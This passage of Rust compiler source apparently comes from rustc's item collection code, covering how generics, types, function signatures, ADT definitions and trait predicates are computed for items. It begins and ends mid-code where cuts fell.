convert_variant_ctor(tcx, struct_def.id());
}
}
// Desugared from `impl Trait` -> visited by the function's return type
hir::ItemKind::Existential(hir::ExistTy {
impl_trait_fn: Some(_),
..
}) => {}
hir::ItemKind::Existential(..)
| hir::ItemKind::Ty(..)
| hir::ItemKind::Static(..)
| hir::ItemKind::Const(..)
| hir::ItemKind::Fn(..) => {
tcx.generics_of(def_id);
tcx.type_of(def_id);
tcx.predicates_of(def_id);
if let hir::ItemKind::Fn(..) = it.node {
tcx.fn_sig(def_id);
}
}
}
}
fn convert_trait_item<'a, 'tcx>(tcx: TyCtxt<'a, 'tcx, 'tcx>, trait_item_id: ast::NodeId) {
let trait_item = tcx.hir.expect_trait_item(trait_item_id);
let def_id = tcx.hir.local_def_id(trait_item.id);
tcx.generics_of(def_id);
match trait_item.node {
hir::TraitItemKind::Const(..)
| hir::TraitItemKind::Type(_, Some(_))
| hir::TraitItemKind::Method(..) => {
tcx.type_of(def_id);
if let hir::TraitItemKind::Method(..) = trait_item.node {
tcx.fn_sig(def_id);
}
}
hir::TraitItemKind::Type(_, None) => {}
};
tcx.predicates_of(def_id);
}
fn convert_impl_item<'a, 'tcx>(tcx: TyCtxt<'a, 'tcx, 'tcx>, impl_item_id: ast::NodeId) {
let def_id = tcx.hir.local_def_id(impl_item_id);
tcx.generics_of(def_id);
tcx.type_of(def_id);
tcx.predicates_of(def_id);
if let hir::ImplItemKind::Method(..) = tcx.hir.expect_impl_item(impl_item_id).node {
tcx.fn_sig(def_id);
}
}
fn convert_variant_ctor<'a, 'tcx>(tcx: TyCtxt<'a, 'tcx, 'tcx>, ctor_id: ast::NodeId) {
let def_id = tcx.hir.local_def_id(ctor_id);
tcx.generics_of(def_id);
tcx.type_of(def_id);
tcx.predicates_of(def_id);
}
fn convert_enum_variant_types<'a, 'tcx>(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
def_id: DefId,
variants: &[hir::Variant],
) {
let def = tcx.adt_def(def_id);
let repr_type = def.repr.discr_type();
let initial = repr_type.initial_discriminant(tcx);
let mut prev_discr = None::<Discr<'tcx>>;
// fill the discriminant values and field types
for variant in variants {
let wrapped_discr = prev_discr.map_or(initial, |d| d.wrap_incr(tcx));
prev_discr = Some(
if let Some(ref e) = variant.node.disr_expr {
let expr_did = tcx.hir.local_def_id(e.id);
def.eval_explicit_discr(tcx, expr_did)
} else if let Some(discr) = repr_type.disr_incr(tcx, prev_discr) {
Some(discr)
} else {
struct_span_err!(
tcx.sess,
variant.span,
E0370,
"enum discriminant overflowed"
).span_label(
variant.span,
format!("overflowed on value after {}", prev_discr.unwrap()),
)
.note(&format!(
"explicitly set `{} = {}` if that is desired outcome",
variant.node.name, wrapped_discr
))
.emit();
None
}.unwrap_or(wrapped_discr),
);
for f in variant.node.data.fields() {
let def_id = tcx.hir.local_def_id(f.id);
tcx.generics_of(def_id);
tcx.type_of(def_id);
tcx.predicates_of(def_id);
}
// Convert the ctor, if any. This also registers the variant as
// an item.
convert_variant_ctor(tcx, variant.node.data.id());
}
}
fn convert_variant<'a, 'tcx>(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
did: DefId,
name: ast::Name,
discr: ty::VariantDiscr,
def: &hir::VariantData,
adt_kind: ty::AdtKind
) -> ty::VariantDef {
let mut seen_fields: FxHashMap<ast::Ident, Span> = FxHashMap();
let node_id = tcx.hir.as_local_node_id(did).unwrap();
let fields = def
.fields()
.iter()
.map(|f| {
let fid = tcx.hir.local_def_id(f.id);
let dup_span = seen_fields.get(&f.ident.modern()).cloned();
if let Some(prev_span) = dup_span {
struct_span_err!(
tcx.sess,
f.span,
E0124,
"field `{}` is already declared",
f.ident
).span_label(f.span, "field already declared")
.span_label(prev_span, format!("`{}` first declared here", f.ident))
.emit();
} else {
seen_fields.insert(f.ident.modern(), f.span);
}
ty::FieldDef {
did: fid,
ident: f.ident,
vis: ty::Visibility::from_hir(&f.vis, node_id, tcx),
}
})
.collect();
ty::VariantDef::new(tcx,
did,
name,
discr,
fields,
adt_kind,
CtorKind::from_hir(def))
}
fn adt_def<'a, 'tcx>(tcx: TyCtxt<'a, 'tcx, 'tcx>, def_id: DefId) -> &'tcx ty::AdtDef {
use rustc::hir::*;
let node_id = tcx.hir.as_local_node_id(def_id).unwrap();
let item = match tcx.hir.get(node_id) {
Node::Item(item) => item,
_ => bug!(),
};
let repr = ReprOptions::new(tcx, def_id);
let (kind, variants) = match item.node {
ItemKind::Enum(ref def, _) => {
let mut distance_from_explicit = 0;
(
AdtKind::Enum,
def.variants
.iter()
.map(|v| {
let did = tcx.hir.local_def_id(v.node.data.id());
let discr = if let Some(ref e) = v.node.disr_expr {
distance_from_explicit = 0;
ty::VariantDiscr::Explicit(tcx.hir.local_def_id(e.id))
} else {
ty::VariantDiscr::Relative(distance_from_explicit)
};
distance_from_explicit += 1;
convert_variant(tcx, did, v.node.name, discr, &v.node.data, AdtKind::Enum)
})
.collect(),
)
}
ItemKind::Struct(ref def, _) => {
// Use separate constructor id for unit/tuple structs and reuse did for braced structs.
let ctor_id = if !def.is_struct() {
Some(tcx.hir.local_def_id(def.id()))
} else {
None
};
(
AdtKind::Struct,
vec![convert_variant(
tcx,
ctor_id.unwrap_or(def_id),
item.name,
ty::VariantDiscr::Relative(0),
def,
AdtKind::Struct
)],
)
}
ItemKind::Union(ref def, _) => (
AdtKind::Union,
vec![convert_variant(
tcx,
def_id,
item.name,
ty::VariantDiscr::Relative(0),
def,
AdtKind::Union
)],
),
_ => bug!(),
};
tcx.alloc_adt_def(def_id, kind, variants, repr)
}
/// Ensures that the super-predicates of the trait with def-id
/// trait_def_id are converted and stored. This also ensures that
/// the transitive super-predicates are converted;
fn super_predicates_of<'a, 'tcx>(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
trait_def_id: DefId,
) -> ty::GenericPredicates<'tcx> {
debug!("super_predicates(trait_def_id={:?})", trait_def_id);
let trait_node_id = tcx.hir.as_local_node_id(trait_def_id).unwrap();
let item = match tcx.hir.get(trait_node_id) {
Node::Item(item) => item,
_ => bug!("trait_node_id {} is not an item", trait_node_id),
};
let (generics, bounds) = match item.node {
hir::ItemKind::Trait(.., ref generics, ref supertraits, _) => (generics, supertraits),
hir::ItemKind::TraitAlias(ref generics, ref supertraits) => (generics, supertraits),
_ => span_bug!(item.span, "super_predicates invoked on non-trait"),
};
let icx = ItemCtxt::new(tcx, trait_def_id);
// Convert the bounds that follow the colon, e.g. `Bar+Zed` in `trait Foo : Bar+Zed`.
let self_param_ty = tcx.mk_self_type();
let superbounds1 = compute_bounds(&icx, self_param_ty, bounds, SizedByDefault::No, item.span);
let superbounds1 = superbounds1.predicates(tcx, self_param_ty);
// Convert any explicit superbounds in the where clause,
// e.g. `trait Foo where Self : Bar`:
let superbounds2 = icx.type_parameter_bounds_in_generics(generics, item.id, self_param_ty);
// Combine the two lists to form the complete set of superbounds:
let superbounds: Vec<_> = superbounds1.into_iter().chain(superbounds2).collect();
// Now require that immediate supertraits are converted,
// which will, in turn, reach indirect supertraits.
for bound in superbounds.iter().filter_map(|p| p.to_opt_poly_trait_ref()) {
tcx.at(item.span).super_predicates_of(bound.def_id());
}
ty::GenericPredicates {
parent: None,
predicates: superbounds,
}
}
fn trait_def<'a, 'tcx>(tcx: TyCtxt<'a, 'tcx, 'tcx>, def_id: DefId) -> &'tcx ty::TraitDef {
let node_id = tcx.hir.as_local_node_id(def_id).unwrap();
let item = tcx.hir.expect_item(node_id);
let (is_auto, unsafety) = match item.node {
hir::ItemKind::Trait(is_auto, unsafety, ..) => (is_auto == hir::IsAuto::Yes, unsafety),
hir::ItemKind::TraitAlias(..) => (false, hir::Unsafety::Normal),
_ => span_bug!(item.span, "trait_def_of_item invoked on non-trait"),
};
let paren_sugar = tcx.has_attr(def_id, "rustc_paren_sugar");
if paren_sugar && !tcx.features().unboxed_closures {
let mut err = tcx.sess.struct_span_err(
item.span,
"the `#[rustc_paren_sugar]` attribute is a temporary means of controlling \
which traits can use parenthetical notation",
);
help!(
&mut err,
"add `#![feature(unboxed_closures)]` to \
the crate attributes to use it"
);
err.emit();
}
let def_path_hash = tcx.def_path_hash(def_id);
let def = ty::TraitDef::new(def_id, unsafety, paren_sugar, is_auto, def_path_hash);
tcx.alloc_trait_def(def)
}
fn has_late_bound_regions<'a, 'tcx>(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
node: Node<'tcx>,
) -> Option<Span> {
struct LateBoundRegionsDetector<'a, 'tcx: 'a> {
tcx: TyCtxt<'a, 'tcx, 'tcx>,
outer_index: ty::DebruijnIndex,
has_late_bound_regions: Option<Span>,
}
impl<'a, 'tcx> Visitor<'tcx> for LateBoundRegionsDetector<'a, 'tcx> {
fn nested_visit_map<'this>(&'this mut self) -> NestedVisitorMap<'this, 'tcx> {
NestedVisitorMap::None
}
fn visit_ty(&mut self, ty: &'tcx hir::Ty) {
if self.has_late_bound_regions.is_some() {
return;
}
match ty.node {
hir::TyKind::BareFn(..) => {
self.outer_index.shift_in(1);
intravisit::walk_ty(self, ty);
self.outer_index.shift_out(1);
}
_ => intravisit::walk_ty(self, ty),
}
}
fn visit_poly_trait_ref(
&mut self,
tr: &'tcx hir::PolyTraitRef,
m: hir::TraitBoundModifier,
) {
if self.has_late_bound_regions.is_some() {
return;
}
self.outer_index.shift_in(1);
intravisit::walk_poly_trait_ref(self, tr, m);
self.outer_index.shift_out(1);
}
fn visit_lifetime(&mut self, lt: &'tcx hir::Lifetime) {
if self.has_late_bound_regions.is_some() {
return;
}
let hir_id = self.tcx.hir.node_to_hir_id(lt.id);
match self.tcx.named_region(hir_id) {
Some(rl::Region::Static) | Some(rl::Region::EarlyBound(..)) => {}
Some(rl::Region::LateBound(debruijn, _, _))
| Some(rl::Region::LateBoundAnon(debruijn, _)) if debruijn < self.outer_index => {}
Some(rl::Region::LateBound(..))
| Some(rl::Region::LateBoundAnon(..))
| Some(rl::Region::Free(..))
| None => {
self.has_late_bound_regions = Some(lt.span);
}
}
}
}
fn has_late_bound_regions<'a, 'tcx>(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
generics: &'tcx hir::Generics,
decl: &'tcx hir::FnDecl,
) -> Option<Span> {
let mut visitor = LateBoundRegionsDetector {
tcx,
outer_index: ty::INNERMOST,
has_late_bound_regions: None,
};
for param in &generics.params {
match param.kind {
GenericParamKind::Lifetime { .. } => {
let hir_id = tcx.hir.node_to_hir_id(param.id);
if tcx.is_late_bound(hir_id) {
return Some(param.span);
}
}
_ => {}
}
}
visitor.visit_fn_decl(decl);
visitor.has_late_bound_regions
}
match node {
Node::TraitItem(item) => match item.node {
hir::TraitItemKind::Method(ref sig, _) => {
has_late_bound_regions(tcx, &item.generics, &sig.decl)
}
_ => None,
},
Node::ImplItem(item) => match item.node {
hir::ImplItemKind::Method(ref sig, _) => {
has_late_bound_regions(tcx, &item.generics, &sig.decl)
}
_ => None,
},
Node::ForeignItem(item) => match item.node {
hir::ForeignItemKind::Fn(ref fn_decl, _, ref generics) => {
has_late_bound_regions(tcx, generics, fn_decl)
}
_ => None,
},
Node::Item(item) => match item.node {
hir::ItemKind::Fn(ref fn_decl, .., ref generics, _) => {
has_late_bound_regions(tcx, generics, fn_decl)
}
_ => None,
},
_ => None,
}
}
fn generics_of<'a, 'tcx>(tcx: TyCtxt<'a, 'tcx, 'tcx>, def_id: DefId) -> &'tcx ty::Generics {
use rustc::hir::*;
let node_id = tcx.hir.as_local_node_id(def_id).unwrap();
let node = tcx.hir.get(node_id);
let parent_def_id = match node {
Node::ImplItem(_) | Node::TraitItem(_) | Node::Variant(_)
| Node::StructCtor(_) | Node::Field(_) => {
let parent_id = tcx.hir.get_parent(node_id);
Some(tcx.hir.local_def_id(parent_id))
}
Node::Expr(&hir::Expr {
node: hir::ExprKind::Closure(..),
..
}) => Some(tcx.closure_base_def_id(def_id)),
Node::Item(item) => match item.node {
ItemKind::Existential(hir::ExistTy { impl_trait_fn, .. }) => impl_trait_fn,
_ => None,
},
_ => None,
};
let mut opt_self = None;
let mut allow_defaults = false;
let no_generics = hir::Generics::empty();
let ast_generics = match node {
Node::TraitItem(item) => &item.generics,
Node::ImplItem(item) => &item.generics,
Node::Item(item) => {
match item.node {
ItemKind::Fn(.., ref generics, _) | ItemKind::Impl(_, _, _, ref generics, ..) => {
generics
}
ItemKind::Ty(_, ref generics)
| ItemKind::Enum(_, ref generics)
| ItemKind::Struct(_, ref generics)
| ItemKind::Existential(hir::ExistTy { ref generics, .. })
| ItemKind::Union(_, ref generics) => {
allow_defaults = true;
generics
}
ItemKind::Trait(_, _, ref generics, ..)
| ItemKind::TraitAlias(ref generics, ..) => {
// Add in the self type parameter.
//
// Something of a hack: use the node id for the trait, also as
// the node id for the Self type parameter.
let param_id = item.id;
opt_self = Some(ty::GenericParamDef {
index: 0,
name: keywords::SelfType.name().as_interned_str(),
def_id: tcx.hir.local_def_id(param_id),
pure_wrt_drop: false,
kind: ty::GenericParamDefKind::Type {
has_default: false,
object_lifetime_default: rl::Set1::Empty,
synthetic: None,
},
});
allow_defaults = true;
generics
}
_ => &no_generics,
}
}
Node::ForeignItem(item) => match item.node {
ForeignItemKind::Static(..) => &no_generics,
ForeignItemKind::Fn(_, _, ref generics) => generics,
ForeignItemKind::Type => &no_generics,
},
_ => &no_generics,
};
let has_self = opt_self.is_some();
let mut parent_has_self = false;
let mut own_start = has_self as u32;
let parent_count = parent_def_id.map_or(0, |def_id| {
let generics = tcx.generics_of(def_id);
assert_eq!(has_self, false);
parent_has_self = generics.has_self;
own_start = generics.count() as u32;
generics.parent_count + generics.params.len()
});
let mut params: Vec<_> = opt_self.into_iter().collect();
let early_lifetimes = early_bound_lifetimes_from_generics(tcx, ast_generics);
params.extend(
early_lifetimes
.enumerate()
.map(|(i, param)| ty::GenericParamDef {
name: param.name.ident().as_interned_str(),
index: own_start + i as u32,
def_id: tcx.hir.local_def_id(param.id),
pure_wrt_drop: param.pure_wrt_drop,
kind: ty::GenericParamDefKind::Lifetime,
}),
);
let hir_id = tcx.hir.node_to_hir_id(node_id);
let object_lifetime_defaults = tcx.object_lifetime_defaults(hir_id);
// Now create the real type parameters.
let type_start = own_start - has_self as u32 + params.len() as u32;
let mut i = 0;
params.extend(
ast_generics
.params
.iter()
.filter_map(|param| match param.kind {
GenericParamKind::Type {
ref default,
synthetic,
..
} => {
if param.name.ident().name == keywords::SelfType.name() {
span_bug!(
param.span,
"`Self` should not be the name of a regular parameter"
);
}
if !allow_defaults && default.is_some() {
if !tcx.features().default_type_parameter_fallback {
tcx.lint_node(
lint::builtin::INVALID_TYPE_PARAM_DEFAULT,
param.id,
param.span,
&format!(
"defaults for type parameters are only allowed in \
`struct`, `enum`, `type`, or `trait` definitions."
),
);
}
}
let ty_param = ty::GenericParamDef {
index: type_start + i as u32,
name: param.name.ident().as_interned_str(),
def_id: tcx.hir.local_def_id(param.id),
pure_wrt_drop: param.pure_wrt_drop,
kind: ty::GenericParamDefKind::Type {
has_default: default.is_some(),
object_lifetime_default: object_lifetime_defaults
.as_ref()
.map_or(rl::Set1::Empty, |o| o[i]),
synthetic,
},
};
i += 1;
Some(ty_param)
}
_ => None,
}),
);
// provide junk type parameter defs - the only place that
// cares about anything but the length is instantiation,
// and we don't do that for closures.
if let Node::Expr(&hir::Expr {
node: hir::ExprKind::Closure(.., gen),
..
}) = node
{
let dummy_args = if gen.is_some() {
&["<yield_ty>", "<return_ty>", "<witness>"][..]
} else {
&["<closure_kind>", "<closure_signature>"][..]
};
params.extend(
dummy_args
.iter()
.enumerate()
.map(|(i, &arg)| ty::GenericParamDef {
index: type_start + i as u32,
name: Symbol::intern(arg).as_interned_str(),
def_id,
pure_wrt_drop: false,
kind: ty::GenericParamDefKind::Type {
has_default: false,
object_lifetime_default: rl::Set1::Empty,
synthetic: None,
},
}),
);
tcx.with_freevars(node_id, |fv| {
params.extend(fv.iter().zip((dummy_args.len() as u32)..).map(|(_, i)| {
ty::GenericParamDef {
index: type_start + i,
name: Symbol::intern("<upvar>").as_interned_str(),
def_id,
pure_wrt_drop: false,
kind: ty::GenericParamDefKind::Type {
has_default: false,
object_lifetime_default: rl::Set1::Empty,
synthetic: None,
},
}
}));
});
}
let param_def_id_to_index = params
.iter()
.map(|param| (param.def_id, param.index))
.collect();
tcx.alloc_generics(ty::Generics {
parent: parent_def_id,
parent_count,
params,
param_def_id_to_index,
has_self: has_self || parent_has_self,
has_late_bound_regions: has_late_bound_regions(tcx, node),
})
}
fn report_assoc_ty_on_inherent_impl<'a, 'tcx>(tcx: TyCtxt<'a, 'tcx, 'tcx>, span: Span) {
span_err!(
tcx.sess,
span,
E0202,
"associated types are not allowed in inherent impls"
);
}
fn type_of<'a, 'tcx>(tcx: TyCtxt<'a, 'tcx, 'tcx>, def_id: DefId) -> Ty<'tcx> {
use rustc::hir::*;
let node_id = tcx.hir.as_local_node_id(def_id).unwrap();
let icx = ItemCtxt::new(tcx, def_id);
match tcx.hir.get(node_id) {
Node::TraitItem(item) => match item.node {
TraitItemKind::Method(..) => {
let substs = Substs::identity_for_item(tcx, def_id);
tcx.mk_fn_def(def_id, substs)
}
TraitItemKind::Const(ref ty, _) | TraitItemKind::Type(_, Some(ref ty)) => icx.to_ty(ty),
TraitItemKind::Type(_, None) => {
span_bug!(item.span, "associated type missing default");
}
},
Node::ImplItem(item) => match item.node {
ImplItemKind::Method(..) => {
let substs = Substs::identity_for_item(tcx, def_id);
tcx.mk_fn_def(def_id, substs)
}
ImplItemKind::Const(ref ty, _) => icx.to_ty(ty),
ImplItemKind::Existential(_) => {
if tcx
.impl_trait_ref(tcx.hir.get_parent_did(node_id))
.is_none()
{
report_assoc_ty_on_inherent_impl(tcx, item.span);
}
find_existential_constraints(tcx, def_id)
}
ImplItemKind::Type(ref ty) => {
if tcx
.impl_trait_ref(tcx.hir.get_parent_did(node_id))
.is_none()
{
report_assoc_ty_on_inherent_impl(tcx, item.span);
}
icx.to_ty(ty)
}
},
Node::Item(item) => {
match item.node {
ItemKind::Static(ref t, ..)
| ItemKind::Const(ref t, _)
| ItemKind::Ty(ref t, _)
| ItemKind::Impl(.., ref t, _) => icx.to_ty(t),
ItemKind::Fn(..) => {
let substs = Substs::identity_for_item(tcx, def_id);
tcx.mk_fn_def(def_id, substs)
}
ItemKind::Enum(..) | ItemKind::Struct(..) | ItemKind::Union(..) => {
let def = tcx.adt_def(def_id);
let substs = Substs::identity_for_item(tcx, def_id);
tcx.mk_adt(def, substs)
}
ItemKind::Existential(hir::ExistTy {
impl_trait_fn: None,
..
}) => find_existential_constraints(tcx, def_id),
// existential types desugared from impl Trait
ItemKind::Existential(hir::ExistTy {
impl_trait_fn: Some(owner),
..
}) => {
tcx.typeck_tables_of(owner)
.concrete_existential_types
.get(&def_id)
.cloned()
.unwrap_or_else(|| {
// This can occur if some error in the
// owner fn prevented us from populating
// the `concrete_existential_types` table.
tcx.sess.delay_span_bug(
DUMMY_SP,
&format!(
"owner {:?} has no existential type for {:?} in its tables",
owner, def_id,
),
);
tcx.types.err
})
}
ItemKind::Trait(..)
| ItemKind::TraitAlias(..)
| ItemKind::Mod(..)
| ItemKind::ForeignMod(..)
| ItemKind::GlobalAsm(..)
| ItemKind::ExternCrate(..)
| ItemKind::Use(..) => {
span_bug!(
item.span,
"compute_type_of_item: unexpected item type: {:?}",
item.node
);
}
}
}
Node::ForeignItem(foreign_item) => match foreign_item.node {
ForeignItemKind::Fn(..) => {
let substs = Substs::identity_for_item(tcx, def_id);
tcx.mk_fn_def(def_id, substs)
}
ForeignItemKind::Static(ref t, _) => icx.to_ty(t),
ForeignItemKind::Type => tcx.mk_foreign(def_id),
},
Node::StructCtor(&ref def)
| Node::Variant(&Spanned {
node: hir::VariantKind { data: ref def, .. },
..
}) => match *def {
VariantData::Unit(..) | VariantData::Struct(..) => {
tcx.type_of(tcx.hir.get_parent_did(node_id))
}
VariantData::Tuple(..) => {
let substs = Substs::identity_for_item(tcx, def_id);
tcx.mk_fn_def(def_id, substs)
}
},
Node::Field(field) => icx.to_ty(&field.ty),
Node::Expr(&hir::Expr {
node: hir::ExprKind::Closure(.., gen),
..
}) => {
if gen.is_some() {
let hir_id = tcx.hir.node_to_hir_id(node_id);
return tcx.typeck_tables_of(def_id).node_id_to_type(hir_id);
}
let substs = ty::ClosureSubsts {
substs: Substs::identity_for_item(tcx, def_id),
};
tcx.mk_closure(def_id, substs)
}
Node::AnonConst(_) => match tcx.hir.get(tcx.hir.get_parent_node(node_id)) {
Node::Ty(&hir::Ty {
node: hir::TyKind::Array(_, ref constant),
..
})
| Node::Ty(&hir::Ty {
node: hir::TyKind::Typeof(ref constant),
..
})
| Node::Expr(&hir::Expr {
node: ExprKind::Repeat(_, ref constant),
..
}) if constant.id == node_id =>
{
tcx.types.usize
}
Node::Variant(&Spanned {
node:
VariantKind {
disr_expr: Some(ref e),
..
},
..
}) if e.id == node_id =>
{
tcx.adt_def(tcx.hir.get_parent_did(node_id))
.repr
.discr_type()
.to_ty(tcx)
}
x => {
bug!("unexpected const parent in type_of_def_id(): {:?}", x);
}
},
Node::GenericParam(param) => match param.kind {
hir::GenericParamKind::Type {
default: Some(ref ty),
..
} => icx.to_ty(ty),
_ => bug!("unexpected non-type NodeGenericParam"),
},
x => {
bug!("unexpected sort of node in type_of_def_id(): {:?}", x);
}
}
}
fn find_existential_constraints<'a, 'tcx>(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
def_id: DefId,
) -> ty::Ty<'tcx> {
use rustc::hir::*;
struct ConstraintLocator<'a, 'tcx: 'a> {
tcx: TyCtxt<'a, 'tcx, 'tcx>,
def_id: DefId,
found: Option<(Span, ty::Ty<'tcx>)>,
}
impl<'a, 'tcx> ConstraintLocator<'a, 'tcx> {
fn check(&mut self, def_id: DefId) {
trace!("checking {:?}", def_id);
// don't try to check items that cannot possibly constrain the type
if !self.tcx.has_typeck_tables(def_id) {
trace!("no typeck tables for {:?}", def_id);
return;
}
let ty = self
.tcx
.typeck_tables_of(def_id)
.concrete_existential_types
.get(&self.def_id)
.cloned();
if let Some(ty) = ty {
// FIXME(oli-obk): trace the actual span from inference to improve errors
let span = self.tcx.def_span(def_id);
if let Some((prev_span, prev_ty)) = self.found {
if ty != prev_ty {
// found different concrete types for the existential type
let mut err = self.tcx.sess.struct_span_err(
span,
"defining existential type use differs from previous",
);
err.span_note(prev_span, "previous use here");
err.emit();
}
} else {
self.found = Some((span, ty));
}
}
}
}
impl<'a, 'tcx> intravisit::Visitor<'tcx> for ConstraintLocator<'a, 'tcx> {
fn nested_visit_map<'this>(&'this mut self) -> intravisit::NestedVisitorMap<'this, 'tcx> {
intravisit::NestedVisitorMap::All(&self.tcx.hir)
}
fn visit_item(&mut self, it: &'tcx Item) {
let def_id = self.tcx.hir.local_def_id(it.id);
// the existential type itself or its children are not within its reveal scope
if def_id != self.def_id {
self.check(def_id);
intravisit::walk_item(self, it);
}
}
fn visit_impl_item(&mut self, it: &'tcx ImplItem) {
let def_id = self.tcx.hir.local_def_id(it.id);
// the existential type itself or its children are not within its reveal scope
if def_id != self.def_id {
self.check(def_id);
intravisit::walk_impl_item(self, it);
}
}
fn visit_trait_item(&mut self, it: &'tcx TraitItem) {
let def_id = self.tcx.hir.local_def_id(it.id);
self.check(def_id);
intravisit::walk_trait_item(self, it);
}
}
let mut locator = ConstraintLocator {
def_id,
tcx,
found: None,
};
let node_id = tcx.hir.as_local_node_id(def_id).unwrap();
let parent = tcx.hir.get_parent(node_id);
trace!("parent_id: {:?}", parent);
if parent == ast::CRATE_NODE_ID {
intravisit::walk_crate(&mut locator, tcx.hir.krate());
} else {
trace!("parent: {:?}", tcx.hir.get(parent));
match tcx.hir.get(parent) {
Node::Item(ref it) => intravisit::walk_item(&mut locator, it),
Node::ImplItem(ref it) => intravisit::walk_impl_item(&mut locator, it),
Node::TraitItem(ref it) => intravisit::walk_trait_item(&mut locator, it),
other => bug!(
"{:?} is not a valid parent of an existential type item",
other
),
}
}
match locator.found {
Some((_, ty)) => ty,
None => {
let span = tcx.def_span(def_id);
tcx.sess.span_err(span, "could not find defining uses");
tcx.types.err
}
}
}
fn fn_sig<'a, 'tcx>(tcx: TyCtxt<'a, 'tcx, 'tcx>, def_id: DefId) -> ty::PolyFnSig<'tcx> {
use rustc::hir::*;
use rustc::hir::Node::*;
let node_id = tcx.hir.as_local_node_id(def_id).unwrap();
let icx = ItemCtxt::new(tcx, def_id);
match tcx.hir.get(node_id) {
TraitItem(hir::TraitItem {
node: TraitItemKind::Method(sig, _),
..
})
| ImplItem(hir::ImplItem {
node: ImplItemKind::Method(sig, _),
..
}) => AstConv::ty_of_fn(&icx, sig.header.unsafety, sig.header.abi, &sig.decl),
Item(hir::Item {
node: ItemKind::Fn(decl, header, _, _),
..
}) => AstConv::ty_of_fn(&icx, header.unsafety, header.abi, decl),
ForeignItem(&hir::ForeignItem {
node: ForeignItemKind::Fn(ref fn_decl, _, _),
..
}) => {
let abi = tcx.hir.get_foreign_abi(node_id);
compute_sig_of_foreign_fn_decl(tcx, def_id, fn_decl, abi)
}
StructCtor(&VariantData::Tuple(ref fields, _))
| Variant(&Spanned {
node:
hir::VariantKind {
data: VariantData::Tuple(ref fields, _),
..
},
..
}) => {
let ty = tcx.type_of(tcx.hir.get_parent_did(node_id));
let inputs = fields
.iter()
.map(|f| tcx.type_of(tcx.hir.local_def_id(f.id)));
ty::Binder::bind(tcx.mk_fn_sig(
inputs,
ty,
false,
hir::Unsafety::Normal,
abi::Abi::Rust,
))
}
Expr(&hir::Expr {
node: hir::ExprKind::Closure(..),
..
}) => {
// Closure signatures are not like other function
// signatures and cannot be accessed through `fn_sig`. For
// example, a closure signature excludes the `self`
// argument. In any case they are embedded within the
// closure type as part of the `ClosureSubsts`.
//
// To get
// the signature of a closure, you should use the
// `closure_sig` method on the `ClosureSubsts`:
//
// closure_substs.closure_sig(def_id, tcx)
//
// or, inside of an inference context, you can use
//
// infcx.closure_sig(def_id, closure_substs)
bug!("to get the signature of a closure, use `closure_sig()` not `fn_sig()`");
}
x => {
bug!("unexpected sort of node in fn_sig(): {:?}", x);
}
}
}
fn impl_trait_ref<'a, 'tcx>(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
def_id: DefId,
) -> Option<ty::TraitRef<'tcx>> {
let icx = ItemCtxt::new(tcx, def_id);
let node_id = tcx.hir.as_local_node_id(def_id).unwrap();
match tcx.hir.expect_item(node_id).node {
hir::ItemKind::Impl(.., ref opt_trait_ref, _, _) => {
opt_trait_ref.as_ref().map(|ast_trait_ref| {
let selfty = tcx.type_of(def_id);
AstConv::instantiate_mono_trait_ref(&icx, ast_trait_ref, selfty)
})
}
_ => bug!(),
}
}
fn impl_polarity<'a, 'tcx>(tcx: TyCtxt<'a, 'tcx, 'tcx>, def_id: DefId) -> hir::ImplPolarity {
let node_id = tcx.hir.as_local_node_id(def_id).unwrap();
match tcx.hir.expect_item(node_id).node {
hir::ItemKind::Impl(_, polarity, ..) => polarity,
ref item => bug!("impl_polarity: {:?} not an impl", item),
}
}
// Is it marked with ?Sized
fn is_unsized<'gcx: 'tcx, 'tcx>(
astconv: &dyn AstConv<'gcx, 'tcx>,
ast_bounds: &[hir::GenericBound],
span: Span,
) -> bool {
let tcx = astconv.tcx();
// Try to find an unbound in bounds.
let mut unbound = None;
for ab in ast_bounds {
if let &hir::GenericBound::Trait(ref ptr, hir::TraitBoundModifier::Maybe) = ab {
if unbound.is_none() {
unbound = Some(ptr.trait_ref.clone());
} else {
span_err!(
tcx.sess,
span,
E0203,
"type parameter has more than one relaxed default \
bound, only one is supported"
);
}
}
}
let kind_id = tcx.lang_items().require(SizedTraitLangItem);
match unbound {
Some(ref tpb) => {
// FIXME(#8559) currently requires the unbound to be built-in.
if let Ok(kind_id) = kind_id {
if tpb.path.def != Def::Trait(kind_id) {
tcx.sess.span_warn(
span,
"default bound relaxed for a type parameter, but \
this does nothing because the given bound is not \
a default. Only `?Sized` is supported",
);
}
}
}
_ if kind_id.is_ok() => {
return false;
}
// No lang item for Sized, so we can't add it as a bound.
None => {}
}
true
}
/// Returns the early-bound lifetimes declared in this generics
/// listing. For anything other than fns/methods, this is just all
/// the lifetimes that are declared. For fns or methods, we have to
/// screen out those that do not appear in any where-clauses etc using
/// `resolve_lifetime::early_bound_lifetimes`.
fn early_bound_lifetimes_from_generics<'a, 'tcx>(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
generics: &'a hir::Generics,
) -> impl Iterator<Item = &'a hir::GenericParam> + Captures<'tcx> {
generics
.params
.iter()
.filter(move |param| match param.kind {
GenericParamKind::Lifetime { .. } => {
let hir_id = tcx.hir.node_to_hir_id(param.id);
!tcx.is_late_bound(hir_id)
}
_ => false,
})
}
fn predicates_defined_on<'a, 'tcx>(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
def_id: DefId,
) -> ty::GenericPredicates<'tcx> {
let explicit = tcx.explicit_predicates_of(def_id);
let predicates = if tcx.sess.features_untracked().infer_outlives_requirements {
[
&explicit.predicates[..],
&tcx.inferred_outlives_of(def_id)[..],
].concat()
} else {
explicit.predicates
};
ty::GenericPredicates {
parent: explicit.parent,
predicates: predicates,
}
}
fn predicates_of<'a, 'tcx>(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
def_id: DefId,
) -> ty::GenericPredicates<'tcx> {
let ty::GenericPredicates {
parent,
mut predicates,
} = tcx.predicates_defined_on(def_id);
if tcx.is_trait(def_id) {
// For traits, add `Self: Trait` predicate. This is
// not part of the predicates that a user writes, but it
// is something that one must prove in order to invoke a
// method or project an associated type.
//
// In the chalk setup, this predicate is not part of the
// "predicates" for a trait item. But it is useful in
// rustc because if you directly (e.g.) invoke a trait
